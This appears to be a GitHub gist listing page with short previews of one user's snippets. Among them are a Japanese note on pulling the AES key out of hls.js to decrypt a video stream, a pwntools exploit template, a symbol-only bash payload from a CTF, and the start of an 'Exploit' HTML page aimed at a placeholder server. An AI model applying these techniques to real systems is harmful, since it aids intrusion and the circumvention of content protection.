bundleされたhls.jsを見てgetDecryptDataにbreakpointを張る
一回目はパスして、二回目のthis.keyを見るとAESのkeyがわかる
あとはffmpegでmp4を復元する
satoooon satoooon8888
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <head> | |
| <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script> | |
| <style> | |
| pre { | |
| margin: 3px; | |
| padding: 2px; | |
| background-color: #DDDDDD; | |
| } | |
| </style> | |
| </head> |
satoooon8888
/ microbit_reciever.py
Created
July 7, 2020 23:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from microbit import * | |
| import radio | |
| def main(): | |
| max_length = 251 | |
| channel = 64 | |
| radio.config(length=max_length, channel=channel) | |
| display.show(Image.HAPPY) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| import re | |
| context.terminal = "wterminal" | |
| context.arch = "amd64" | |
| def get_io(): | |
| if len(sys.argv) > 1 and sys.argv[1] == "debug": | |
| io = gdb.debug(file, command) |
satoooon8888
/ patch_libc.sh
Last active
June 28, 2022 15:08
patch libc with ubuntu glibc debug symbol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -ex | |
| LIBC=$(ls * | grep -P '^(libc\.so\.6|libc-.*\.so)$') | |
| LIBC_DBG_DEB="$(~/package/libc-database/identify $LIBC | sed s/libc6_/libc6-dbg_/g).deb" | |
| if [[ ! -e $LIBC_DBG_DEB ]]; then | |
| wget http://archive.ubuntu.com/ubuntu/pool/main/g/glibc/$LIBC_DBG_DEB | |
| fi | |
| DEBUGID=$(file $LIBC | grep -Po '(?<=BuildID\[sha1\]=)[0-9a-f]{40}') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 記号のみでbashを動かす問題 | |
| # 参考: | |
| # https://www.ryotosaito.com/blog/?p=178 | |
| # https://www.ryotosaito.com/blog/?p=194 | |
| command = input() | |
| payload = R""" | |
| __=$(($$/$$)); | |
| ___=$(($__+$__)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import matplotlib.pyplot as plt | |
| import json | |
| import re | |
| from datetime import datetime | |
| events = json.load(open("./events.json")) | |
| events = sorted(events, key=lambda event:datetime.fromisoformat(event["start"])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>Exploit</title> | |
| </head> | |
| <body> | |
| <script type="text/javascript"> | |
| const EXP_HOST = 'http://YOUR_SERVER'; |